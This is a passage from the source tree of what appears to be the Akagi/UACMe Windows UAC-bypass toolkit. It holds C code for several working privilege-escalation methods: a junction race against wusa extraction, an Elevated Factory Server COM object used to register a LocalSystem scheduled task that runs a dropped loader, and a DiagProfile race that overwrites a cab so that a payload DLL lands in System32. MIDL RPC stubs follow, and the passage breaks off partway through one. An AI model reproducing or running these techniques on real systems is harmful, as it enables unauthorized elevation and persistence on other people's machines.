NULL);\n\n status = NtCreateFile(&hDirectory,\n FILE_LIST_DIRECTORY | SYNCHRONIZE,\n &ObjectAttributes,\n &IoStatusBlock,\n NULL,\n FILE_OPEN_FOR_BACKUP_INTENT,\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n FILE_OPEN,\n FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,\n NULL,\n 0);\n\n if (!NT_SUCCESS(status))\n break;\n\n memIO = 1024 * 1024;\n Buffer = supHeapAlloc(memIO);\n if (Buffer == NULL)\n break;\n\n InitializeObjectAttributes(&ObjectAttributes, NULL, 0, 0, NULL);\n status = NtCreateEvent(&hEvent, EVENT_ALL_ACCESS, &ObjectAttributes, NotificationEvent, FALSE);\n if (!NT_SUCCESS(status))\n break;\n\n //\n // Watch for directory changes.\n //\n do {\n\n status = NtNotifyChangeDirectoryFile(hDirectory, hEvent, NULL, NULL,\n &IoStatusBlock, Buffer, (ULONG)memIO, FILE_NOTIFY_CHANGE_DIR_NAME, TRUE);\n\n if (status == STATUS_PENDING)\n NtWaitForSingleObject(hEvent, TRUE, NULL);\n\n NtSetEvent(hEvent, NULL);\n\n pInfo = (FILE_NOTIFY_INFORMATION*)Buffer;\n for (;;) {\n\n if (pInfo->Action == FILE_ACTION_ADDED) {\n\n memIO = pInfo->FileNameLength +\n ((1 + _strlen(szBuffer)) * sizeof(WCHAR));\n\n CapturedDirectoryName = (LPWSTR)supHeapAlloc(memIO);\n\n if (CapturedDirectoryName) {\n _strcpy(CapturedDirectoryName, szBuffer);\n lpEnd = _strend(CapturedDirectoryName);\n RtlCopyMemory(lpEnd, pInfo->FileName, pInfo->FileNameLength);\n\n //\n // Open new directory to set reparse point.\n //\n RtlInitUnicodeString(&usReparseDirectory, CapturedDirectoryName);\n InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);\n status = NtCreateFile(&hReparseDirectory, \n FILE_ALL_ACCESS,\n &ObjectAttributes,\n &IoStatusBlock,\n NULL,\n 0,\n FILE_SHARE_READ | FILE_SHARE_WRITE,\n FILE_OPEN,\n FILE_OPEN_REPARSE_POINT | FILE_SYNCHRONOUS_IO_NONALERT,\n NULL,\n 0);\n\n if (NT_SUCCESS(status)) {\n\n //\n // Set reparse point.\n //\n bResult = supSetMountPoint(hReparseDirectory,\n usTargetDirectory.Buffer,\n lpTargetDirectory);\n\n }\n\n status = STATUS_NO_SECRETS;\n }\n\n } //Action\n\n if (status == STATUS_NO_SECRETS)\n break;\n\n pInfo = (FILE_NOTIFY_INFORMATION*)(((LPBYTE)pInfo) + pInfo->NextEntryOffset);\n if (pInfo->NextEntryOffset == 0)\n break;\n }\n\n } while (NT_SUCCESS(status));\n\n } while (FALSE);\n\n //\n // Cleanup.\n //\n if (hEvent)\n NtClose(hEvent);\n\n if (hDirectory != NULL)\n NtClose(hDirectory);\n\n if (usTargetDirectory.Buffer)\n RtlFreeUnicodeString(&usTargetDirectory);\n\n if (Buffer != NULL)\n supHeapFree(Buffer);\n\n //\n // Remove reparse point.\n //\n if (CapturedDirectoryName) {\n\n while (g_ThreadFinished != 1)\n Sleep(100);\n\n if (hReparseDirectory) {\n supDeleteMountPoint(hReparseDirectory);\n NtClose(hReparseDirectory);\n }\n\n RtlInitUnicodeString(&usReparseDirectory, CapturedDirectoryName);\n InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);\n NtDeleteFile(&ObjectAttributes);\n supHeapFree(CapturedDirectoryName);\n }\n\n return (DWORD)bResult;\n}\n\n/*\n* ucmWusaExtractViaJunction\n*\n* Purpose:\n*\n* Extract cab contents to the specified directory by initializing wusa race condition.\n* This routine expect source as ellocnak.msu cab file in the %temp% folder.\n*\n*/\nBOOL ucmWusaExtractViaJunction(\n _In_ LPWSTR lpTargetDirectory\n)\n{\n HANDLE hWatchdogThread, hWusaThread;\n DWORD ti;\n\n do {\n\n //\n // Run watchdog thread.\n //\n hWatchdogThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxDirectoryWatchdogThread, lpTargetDirectory, 0, &ti);\n if (hWatchdogThread == NULL)\n break;\n\n //\n // Run wusa in separate thread.\n //\n hWusaThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxInvokeWusaThread, NULL, 0, &ti);\n if (hWusaThread) {\n if (WaitForSingleObject(hWusaThread, 15000) == WAIT_TIMEOUT)\n TerminateThread(hWusaThread, 0);\n\n CloseHandle(hWusaThread);\n }\n\n if (WaitForSingleObject(hWatchdogThread, 10000) == WAIT_TIMEOUT)\n TerminateThread(hWatchdogThread, 0);\n\n CloseHandle(hWatchdogThread);\n\n } while (FALSE);\n\n return (g_ThreadFinished == 1);\n}\n"
},
{
"path": "Source/Akagi/methods/zcgonvh.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2020 - 2025\n*\n* TITLE: ZCGONVH.C\n*\n* VERSION: 3.69\n*\n* DATE: 12 Dec 2025\n*\n* UAC bypass methods based on zcgonvh original work.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n#include \"encresource.h\"\n\nHRESULT ucmxGetElevatedFactoryServerObject(\n _In_ LPCWSTR Clsid,\n _Out_ VOID** FactoryServer\n)\n{\n HRESULT r;\n IElevatedFactoryServer* pElevatedServer = NULL;\n\n *FactoryServer = NULL;\n\n r = ucmAllocateElevatedObject(Clsid,\n &IID_ElevatedFactoryServer,\n CLSCTX_LOCAL_SERVER,\n (VOID**)&pElevatedServer);\n\n if (FAILED(r))\n return r;\n\n if (pElevatedServer == NULL) {\n return E_OUTOFMEMORY;\n }\n\n *FactoryServer = pElevatedServer;\n return S_OK;\n}\n\nBOOL ucmxGetElevatedFactoryServerAndTaskService(\n _Out_ IElevatedFactoryServer** FactoryServer,\n _Out_ ITaskService** TaskService\n)\n{\n IElevatedFactoryServer* pElevatedServer = NULL;\n ITaskService* pService = NULL;\n HRESULT r;\n\n *TaskService = NULL;\n *FactoryServer = NULL;\n\n do {\n r = ucmxGetElevatedFactoryServerObject(T_CLSID_VFServer,\n (VOID**)&pElevatedServer);\n\n if (r != S_OK)\n break;\n\n if (pElevatedServer == NULL) {\n r = E_OUTOFMEMORY;\n break;\n }\n\n r = pElevatedServer->lpVtbl->ServerCreateElevatedObject(pElevatedServer,\n &CLSID_TaskScheduler,\n &IID_ITaskService,\n (void**)&pService);\n\n if (r != S_OK) {\n break;\n }\n\n if (pService == NULL) {\n r = E_OUTOFMEMORY;\n break;\n }\n\n *FactoryServer = pElevatedServer;\n *TaskService = pService;\n\n } while (FALSE);\n\n if (FAILED(r)) {\n if (pElevatedServer) {\n pElevatedServer->lpVtbl->Release(pElevatedServer);\n pElevatedServer = NULL;\n }\n }\n\n return SUCCEEDED(r);\n}\n\nBOOL ucmxRegisterAndRunTask(\n _In_ ITaskService* TaskService,\n _In_ BSTR RegistrationData\n)\n{\n HRESULT r = E_FAIL;\n VARIANT varDummy;\n\n ITaskFolder* pTaskFolder = NULL;\n IRegisteredTask* pTask = NULL;\n IRunningTask* pRunningTask = NULL;\n\n TASK_STATE taskState = TASK_STATE_UNKNOWN;\n\n BSTR bstrTaskFolder = NULL, bstrTaskName = NULL;\n\n do {\n\n bstrTaskFolder = SysAllocString(L\"\\\\\");\n if (bstrTaskFolder == NULL)\n break;\n\n bstrTaskName = SysAllocString(THEOLDNEWTHING);\n if (bstrTaskName == NULL)\n break;\n\n VariantInit(&varDummy);\n\n r = TaskService->lpVtbl->Connect(TaskService,\n varDummy,\n varDummy,\n varDummy,\n varDummy);\n\n if (FAILED(r))\n break;\n\n r = TaskService->lpVtbl->GetFolder(TaskService, bstrTaskFolder, &pTaskFolder);\n if (r != S_OK || pTaskFolder == NULL)\n break;\n\n r = pTaskFolder->lpVtbl->RegisterTask(pTaskFolder, bstrTaskName, RegistrationData, 0,\n varDummy, varDummy, TASK_LOGON_INTERACTIVE_TOKEN, varDummy, &pTask);\n\n if (r == HRESULT_FROM_WIN32(ERROR_ALREADY_EXISTS)) {\n\n r = pTaskFolder->lpVtbl->GetTask(pTaskFolder, bstrTaskName, &pTask);\n if (SUCCEEDED(r)) {\n\n pTask->lpVtbl->Stop(pTask, 0);\n pTask->lpVtbl->Release(pTask);\n\n pTaskFolder->lpVtbl->DeleteTask(pTaskFolder, bstrTaskName, 0);\n }\n\n r = pTaskFolder->lpVtbl->RegisterTask(pTaskFolder, bstrTaskName, RegistrationData, 0,\n varDummy, varDummy, TASK_LOGON_INTERACTIVE_TOKEN, varDummy, &pTask);\n }\n\n if (r != S_OK || pTask == NULL)\n break;\n\n r = pTask->lpVtbl->Run(pTask, varDummy, &pRunningTask);\n\n if (r != S_OK || pRunningTask == NULL)\n break;\n\n if (SUCCEEDED(pRunningTask->lpVtbl->get_State(pRunningTask, &taskState))) {\n\n if (taskState == TASK_STATE_RUNNING) {\n Sleep(5000);\n }\n\n }\n pRunningTask->lpVtbl->Stop(pRunningTask);\n pTaskFolder->lpVtbl->DeleteTask(pTaskFolder, bstrTaskName, 0);\n\n } while (FALSE);\n\n if (bstrTaskFolder)\n SysFreeString(bstrTaskFolder);\n\n if (bstrTaskName)\n SysFreeString(bstrTaskName);\n\n if (pRunningTask)\n pRunningTask->lpVtbl->Release(pRunningTask);\n\n if (pTask)\n pTask->lpVtbl->Release(pTask);\n\n if (pTaskFolder)\n pTaskFolder->lpVtbl->Release(pTaskFolder);\n\n return SUCCEEDED(r);\n}\n\nBSTR ucmxBuildParametersForTask(\n _In_ LPCWSTR lpLoader,\n _In_ SIZE_T cbLoader\n)\n{\n BSTR bstrResult = NULL;\n SIZE_T sz;\n PVOID workBuffer, offsetPtr;\n\n sz = cbLoader +\n sizeof(g_encodedTaskParamBegin) +\n sizeof(g_encodedTaskParamEnd);\n\n workBuffer = (PWCH)supHeapAlloc(sz);\n if (workBuffer) {\n\n offsetPtr = workBuffer;\n RtlCopyMemory(offsetPtr, g_encodedTaskParamBegin, sizeof(g_encodedTaskParamBegin));\n EncodeBuffer(offsetPtr, sizeof(g_encodedTaskParamBegin), AKAGI_XOR_KEY2);\n offsetPtr = RtlOffsetToPointer(offsetPtr, sizeof(g_encodedTaskParamBegin));\n\n RtlCopyMemory(offsetPtr, lpLoader, cbLoader);\n offsetPtr = RtlOffsetToPointer(offsetPtr, cbLoader);\n\n RtlCopyMemory(offsetPtr, g_encodedTaskParamEnd, sizeof(g_encodedTaskParamEnd));\n EncodeBuffer(offsetPtr, sizeof(g_encodedTaskParamEnd), AKAGI_XOR_KEY2);\n\n bstrResult = SysAllocString(workBuffer);\n\n supHeapFree(workBuffer);\n }\n\n return bstrResult;\n}\n\n/*\n* ucmVFServerTaskSchedMethod\n*\n* Purpose:\n*\n* Bypass UAC by using Elevated Factory Server COM object.\n*\n* 1. Allocate Elevated Factory Server COM object and produce with it help Task Scheduler object.\n* 2. Use Task Scheduler object to register task running as LocalSystem.\n*\n*/\nNTSTATUS ucmVFServerTaskSchedMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n BOOL bNeedCleanup = FALSE;\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n HRESULT hr_init;\n IElevatedFactoryServer* pElevatedServer = NULL;\n ITaskService* pTaskService = NULL;\n BSTR bstrXml = NULL;\n WCHAR szLoaderFileName[MAX_PATH * 2];\n\n ucmConsolePrint(TEXT(\"[+] Entering ucmVFServerTaskSchedMethod\\r\\n\"));\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n do {\n\n //\n // Write loader to the %temp%\n //\n if (!supReplaceDllEntryPoint(\n ProxyDll,\n ProxyDllSize,\n AKATSUKI_ENTRYPOINT_EXE,\n TRUE))\n {\n break;\n }\n RtlSecureZeroMemory(&szLoaderFileName, sizeof(szLoaderFileName));\n _strcpy(szLoaderFileName, g_ctx->szTempDirectory);\n _strcat(szLoaderFileName, THEOLDNEWTHING);\n _strcat(szLoaderFileName, TEXT(\".exe\"));\n\n bNeedCleanup = supWriteBufferToFile(szLoaderFileName, ProxyDll, ProxyDllSize);\n if (!bNeedCleanup)\n break;\n\n bstrXml = ucmxBuildParametersForTask(szLoaderFileName, _strlen(szLoaderFileName) * sizeof(WCHAR));\n if (bstrXml == NULL)\n break;\n\n if (!ucmxGetElevatedFactoryServerAndTaskService(&pElevatedServer, &pTaskService))\n break;\n\n if (ucmxRegisterAndRunTask(pTaskService, bstrXml))\n MethodResult = STATUS_SUCCESS;\n\n } while (FALSE);\n\n if (bstrXml)\n SysFreeString(bstrXml);\n\n if (pElevatedServer != NULL) {\n pElevatedServer->lpVtbl->Release(pElevatedServer);\n }\n\n if (pTaskService) {\n pTaskService->lpVtbl->Release(pTaskService);\n }\n\n if (SUCCEEDED(hr_init))\n CoUninitialize();\n\n if (bNeedCleanup)\n DeleteFile(szLoaderFileName);\n\n return MethodResult;\n}\n\ntypedef struct _UCMX_OVP {\n PVOID ProxyDll;\n DWORD ProxyDllSize;\n WCHAR TargetFile[MAX_PATH * 2]; //%temp%\\hui32\\results.cab\n} UCMX_OVP, * PUCMX_OVP;\n\nHANDLE OverwriteThreadHandle = NULL;\nLONG TerminateOverwriteThread = FALSE;\n\n/*\n* ucmxOverwriteThread\n*\n* Purpose:\n*\n* Thread for race condition, continuously overwrite diagprofile results.cab file with the payload.\n*\n*/\nDWORD ucmxOverwriteThread(\n _In_ PVOID Parameter)\n{\n UCMX_OVP params;\n HANDLE hTargetFile;\n DWORD bytesIO;\n\n RtlCopyMemory(¶ms, Parameter, sizeof(UCMX_OVP));\n\n while (TRUE) {\n if (TerminateOverwriteThread) {\n break;\n }\n hTargetFile = CreateFile(params.TargetFile,\n GENERIC_WRITE,\n FILE_SHARE_VALID_FLAGS,\n NULL,\n OPEN_EXISTING,\n FILE_ATTRIBUTE_NORMAL,\n NULL);\n\n if (hTargetFile != INVALID_HANDLE_VALUE) {\n WriteFile(hTargetFile, params.ProxyDll, params.ProxyDllSize, &bytesIO, NULL);\n CloseHandle(hTargetFile);\n }\n }\n\n supHeapFree(Parameter);\n CloseHandle(OverwriteThreadHandle);\n OverwriteThreadHandle = NULL;\n return 0;\n}\n\n/*\n* ucmxTriggerDiagProfile\n*\n* Purpose:\n*\n* Allocate elevated diag profile object and call SaveDirectoryAsCab method.\n*\n*/\nHRESULT ucmxTriggerDiagProfile(\n _In_ LPCWSTR lpDirectory\n)\n{\n HRESULT r = E_FAIL;\n\n IElevatedFactoryServer* pElevatedServer = NULL;\n IUnknown* pUnknown = NULL;\n IDispatch* pDispatch = NULL;\n\n CLSID clsid;\n\n DISPID dispid;\n DISPPARAMS dispatchParams;\n LPOLESTR methodName = NULL;\n\n VARIANT result;\n VARIANTARG values[2];\n WCHAR szTarget[MAX_PATH * 2];\n\n values[0].bstrVal = NULL;\n values[1].bstrVal = NULL;\n\n do {\n \n methodName = SysAllocString(L\"SaveDirectoryAsCab\");\n if (methodName == NULL)\n break;\n\n r = ucmxGetElevatedFactoryServerObject(\n T_CLSID_VFServerDiagCpl,\n (VOID**)&pElevatedServer);\n\n if (r != S_OK)\n break;\n\n ucmConsolePrint(TEXT(\"[+] Elevated Factory Server object allocated\\r\\n\"));\n\n r = CLSIDFromString(T_CLSID_DiagnosticProfile, &clsid);\n if (r != S_OK)\n break;\n\n r = pElevatedServer->lpVtbl->ServerCreateElevatedObject(pElevatedServer,\n &clsid,\n &IID_IUnknown,\n (void**)&pUnknown);\n\n if (r != S_OK)\n break;\n\n ucmConsolePrint(TEXT(\"[+] Elevated DiagProfile object allocated\\r\\n\"));\n\n if (pUnknown == NULL) {\n r = E_FAIL;\n break;\n }\n\n r = pUnknown->lpVtbl->QueryInterface(pUnknown, &IID_IDispatch, (VOID**)&pDispatch);\n\n if (r != S_OK)\n break;\n\n ucmConsolePrint(TEXT(\"[+] QueryInterface success\\r\\n\"));\n\n if (pDispatch == NULL) {\n r = E_FAIL;\n break;\n }\n\n r = pDispatch->lpVtbl->GetIDsOfNames(pDispatch, &IID_NULL, &methodName, 1, LOCALE_USER_DEFAULT, &dispid);\n if (r != S_OK)\n break;\n\n ucmConsolePrint(TEXT(\"[+] Dispatch->GetIDsOfNames success\\r\\n\"));\n\n RtlSecureZeroMemory(&dispatchParams, sizeof(dispatchParams));\n\n VariantInit(&values[0]);\n VariantInit(&values[1]);\n\n _strcpy(szTarget, g_ctx->szSystemDirectory);\n _strcat(szTarget, WOW64LOG_DLL);\n\n values[0].vt = VT_BSTR;\n values[0].bstrVal = SysAllocString(szTarget);\n if (values[0].bstrVal == NULL) {\n r = E_OUTOFMEMORY;\n break;\n }\n\n values[1].vt = VT_BSTR;\n values[1].bstrVal = SysAllocString(lpDirectory);\n if (values[1].bstrVal == NULL) {\n r = E_OUTOFMEMORY;\n break;\n }\n\n dispatchParams.cArgs = 2;\n dispatchParams.rgvarg = values;\n\n VariantInit(&result);\n\n r = pDispatch->lpVtbl->Invoke(pDispatch,\n dispid,\n &IID_NULL,\n LOCALE_USER_DEFAULT,\n DISPATCH_METHOD,\n &dispatchParams,\n &result,\n NULL,\n NULL);\n\n ucmConsolePrintValueUlong(TEXT(\"[+] Dispatch->Invoke\"), r, TRUE);\n\n VariantClear(&result);\n\n } while (FALSE);\n\n if (values[0].bstrVal) SysFreeString(values[0].bstrVal);\n if (values[1].bstrVal) SysFreeString(values[1].bstrVal);\n\n if (methodName)\n SysFreeString((BSTR)methodName);\n\n if (pDispatch) {\n pDispatch->lpVtbl->Release(pDispatch);\n }\n\n if (pUnknown) {\n pUnknown->lpVtbl->Release(pUnknown);\n }\n\n if (pElevatedServer != NULL) {\n pElevatedServer->lpVtbl->Release(pElevatedServer);\n }\n\n return r;\n}\n\n/*\n* ucmVFServerDiagProfileMethod\n*\n* Purpose:\n*\n* Bypass UAC by using Elevated Factory Server COM object.\n*\n* 1. Allocate Elevated Factory Server COM object and produce with it help Diag Profiler object.\n* 2. Use Diag Profiler object to move files into protected area via race condition.\n*\n*/\nNTSTATUS ucmVFServerDiagProfileMethod(\n _In_ PVOID ProxyDll,\n _In_ DWORD ProxyDllSize\n)\n{\n NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n HRESULT hr_init, r;\n DWORD dwLastError;\n ULONG retryCount = 0;\n\n UCMX_OVP* ovParams = NULL;\n\n WCHAR szBuffer[MAX_PATH * 2];\n\n ucmConsolePrint(TEXT(\"[+] Entering ucmVFServerDiagProfileMethod\\r\\n\"));\n\n hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n do {\n\n //\n // Create %temp%\\hui32 directory.\n //\n _strcpy(szBuffer, g_ctx->szTempDirectory);\n _strcat(szBuffer, THEOLDNEWTHING);\n if (!CreateDirectory((LPCWSTR)&szBuffer, NULL)) {\n dwLastError = GetLastError();\n if (dwLastError != ERROR_ALREADY_EXISTS) {\n ucmConsolePrintValueUlong(TEXT(\"[!] Could not create directory\\r\\n\"), dwLastError, TRUE);\n break;\n }\n }\n\n ovParams = (UCMX_OVP*)supHeapAlloc(sizeof(UCMX_OVP));\n if (ovParams == NULL)\n break;\n\n ovParams->ProxyDll = ProxyDll;\n ovParams->ProxyDllSize = ProxyDllSize;\n\n _strcpy(ovParams->TargetFile, szBuffer);\n supPathAddBackSlash(ovParams->TargetFile);\n _strcat(ovParams->TargetFile, TEXT(\"results.cab\"));\n\n OverwriteThreadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxOverwriteThread, (PVOID)ovParams, 0, NULL);\n if (OverwriteThreadHandle == NULL) {\n ucmConsolePrintValueUlong(TEXT(\"[!] Cannot create worker thread\\r\\n\"), GetLastError(), TRUE);\n supHeapFree(ovParams);\n break;\n }\n\n SetThreadPriority(OverwriteThreadHandle, THREAD_PRIORITY_TIME_CRITICAL);\n\n r = ucmxTriggerDiagProfile(szBuffer);\n if (FAILED(r)) {\n ucmConsolePrintValueUlong(TEXT(\"[!] DiagProfile does not trigger\\r\\n\"), r, TRUE);\n break;\n }\n\n _InterlockedExchange((LONG*)&TerminateOverwriteThread, TRUE);\n\n _strcpy(szBuffer, g_ctx->szSystemDirectory);\n _strcat(szBuffer, WOW64LOG_DLL);\n\n do {\n\n if (PathFileExists(szBuffer)) {\n ucmConsolePrint(TEXT(\"[+] Payload file installed\\r\\n\"));\n break;\n }\n else\n Sleep(1000);\n\n } while (++retryCount < 10);\n\n _strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot);\n _strcat(szBuffer, SYSWOW64_DIR);\n _strcat(szBuffer, WUSA_EXE);\n\n if (supRunProcess2(szBuffer,\n NULL,\n NULL,\n SW_HIDE,\n 5000))\n {\n ucmConsolePrint(TEXT(\"[+] Target executed\\r\\n\"));\n MethodResult = STATUS_SUCCESS;\n }\n\n } while (FALSE);\n\n if (OverwriteThreadHandle) {\n TerminateThread(OverwriteThreadHandle, 0);\n CloseHandle(OverwriteThreadHandle);\n OverwriteThreadHandle = NULL;\n }\n\n //\n // Cleanup.\n //\n\n if (SUCCEEDED(hr_init))\n CoUninitialize();\n\n return MethodResult;\n}\n"
},
{
"path": "Source/Akagi/pcasvc/w7/pcasvc7.acf",
"content": "[\n\texplicit_handle\n]\ninterface PcaService7\n{\n\tRAiNotifyUserCallbackExceptionProcess();\n}\n"
},
{
"path": "Source/Akagi/pcasvc/w7/pcasvc7.idl",
"content": "[\n\tuuid(0767a036-0d22-48aa-ba69-b619480f38cb),\n\tversion(1.0),\n]\ninterface PcaService7\n{\n\tlong RAiNotifyUserCallbackExceptionProcess(\n\t\thandle_t bindingHandle,\n\t\t[in][string] wchar_t* exePathName,\n\t\t[in]long unknown0,\n\t\t[in]long processId\n\t);\n}\n"
},
{
"path": "Source/Akagi/pcasvc/w7/x64/pcasvc7_64.c",
"content": "/*\n\nFile has been edited after MIDL compiler, changes:\n1. XCFG BS removed\n2. Warning supression added\n3. See pcasvc7__MIDL_ProcFormatString definition \"Modified\" comment\n\n*/\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc7.idl:\n Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 \n protocol : dce , ms_ext, c_ext, robust\n error checks: allocation ref bounds_check enum stub_data \n VC __declspec() decoration level: \n __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING( ) */\n\n#if defined(_M_AMD64)\n\n\n#pragma warning( disable: 4049 ) /* more than 64k source lines */\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#endif\n\n#pragma warning( disable: 4211 ) /* redefine extern to static */\n#pragma warning( disable: 4232 ) /* dllimport identity*/\n#pragma warning( disable: 4024 ) /* array to pointer mapping*/\n\n#include \n\n#include \"pcasvc7_64.h\"\n\n#define TYPE_FORMAT_STRING_SIZE 7 \n#define PROC_FORMAT_STRING_SIZE 55 \n#define EXPR_FORMAT_STRING_SIZE 1 \n#define TRANSMIT_AS_TABLE_SIZE 0 \n#define WIRE_MARSHAL_TABLE_SIZE 0 \n\ntypedef struct _pcasvc7_MIDL_TYPE_FORMAT_STRING\n {\n short Pad;\n unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];\n } pcasvc7_MIDL_TYPE_FORMAT_STRING;\n\ntypedef struct _pcasvc7_MIDL_PROC_FORMAT_STRING\n {\n short Pad;\n unsigned char Format[ PROC_FORMAT_STRING_SIZE ];\n } pcasvc7_MIDL_PROC_FORMAT_STRING;\n\ntypedef struct _pcasvc7_MIDL_EXPR_FORMAT_STRING\n {\n long Pad;\n unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];\n } pcasvc7_MIDL_EXPR_FORMAT_STRING;\n\n\nstatic const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = \n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\n\nextern const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString;\nextern const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString;\nextern const pcasvc7_MIDL_EXPR_FORMAT_STRING pcasvc7__MIDL_ExprFormatString;\n\n#define GENERIC_BINDING_TABLE_SIZE 0 \n\n\n/* Standard interface: PcaService7, ver. 1.0,\n GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */\n\n\n\nstatic const RPC_CLIENT_INTERFACE PcaService7___RpcClientInterface =\n {\n sizeof(RPC_CLIENT_INTERFACE),\n {{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},\n {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\n 0,\n 0,\n 0,\n 0,\n 0,\n 0x00000000\n };\nRPC_IF_HANDLE PcaService7_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService7___RpcClientInterface;\n\nextern const MIDL_STUB_DESC PcaService7_StubDesc;\n\nstatic RPC_BINDING_HANDLE PcaService7__MIDL_AutoBindHandle;\n\n\nlong RAiNotifyUserCallbackExceptionProcess( \n handle_t bindingHandle,\n /* [string][in] */ wchar_t *exePathName,\n /* [in] */ long unknown0,\n /* [in] */ long processId)\n{\n\n CLIENT_CALL_RETURN _RetVal;\n\n _RetVal = NdrClientCall2(\n ( PMIDL_STUB_DESC )&PcaService7_StubDesc,\n (PFORMAT_STRING) &pcasvc7__MIDL_ProcFormatString.Format[0],\n bindingHandle,\n exePathName,\n unknown0,\n processId);\n return ( long )_RetVal.Simple;\n \n}\n\n\n#if !defined(__RPC_WIN64__)\n#error Invalid build platform for this stub.\n#endif\n\nstatic const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString =\n {\n 0,\n {\n\n\t/* Procedure RAiNotifyUserCallbackExceptionProcess */\n\n\t\t\t0x0,\t\t/* 0 */\n\t\t\t0x48,\t\t/* Old Flags: */\n/* 2 */\tNdrFcLong( 0x0 ),\t/* 0 */\n/* 6 */\tNdrFcShort( 0x4 ),\t/* 4 */ /* N.B. Modified */\n/* 8 */\tNdrFcShort( 0x28 ),\t/* X64 Stack size/offset = 40 */\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\n\t\t\t0x0,\t\t/* 0 */\n/* 12 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\n/* 14 */\tNdrFcShort( 0x10 ),\t/* 16 */\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\n/* 18 */\t0x46,\t\t/* Oi2 Flags: clt must size, has return, has ext, */\n\t\t\t0x4,\t\t/* 4 */\n/* 20 */\t0xa,\t\t/* 10 */\n\t\t\t0x1,\t\t/* Ext Flags: new corr desc, */\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 28 */\tNdrFcShort( 0x0 ),\t/* 0 */\n\n\t/* Parameter exePathName */\n\n/* 30 */\tNdrFcShort( 0x10b ),\t/* Flags: must size, must free, in, simple ref, */\n/* 32 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\n/* 34 */\tNdrFcShort( 0x4 ),\t/* Type Offset=4 */\n\n\t/* Parameter unknown0 */\n\n/* 36 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 38 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\n/* 40 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter processId */\n\n/* 42 */\tNdrFcShort( 0x48 ),\t/* Flags: in, base type, */\n/* 44 */\tNdrFcShort( 0x18 ),\t/* X64 Stack size/offset = 24 */\n/* 46 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Return value */\n\n/* 48 */\tNdrFcShort( 0x70 ),\t/* Flags: out, return, base type, */\n/* 50 */\tNdrFcShort( 0x20 ),\t/* X64 Stack size/offset = 32 */\n/* 52 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t\t\t0x0\n }\n };\n\nstatic const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString =\n {\n 0,\n {\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 2 */\t\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\n/* 4 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n\n\t\t\t0x0\n }\n };\n\nstatic const unsigned short PcaService7_FormatStringOffsetTable[] =\n {\n 0\n };\n\n\nstatic const MIDL_STUB_DESC PcaService7_StubDesc = \n {\n (void *)& PcaService7___RpcClientInterface,\n MIDL_user_allocate,\n MIDL_user_free,\n &PcaService7__MIDL_AutoBindHandle,\n 0,\n 0,\n 0,\n 0,\n pcasvc7__MIDL_TypeFormatString.Format,\n 1, /* -error bounds_check 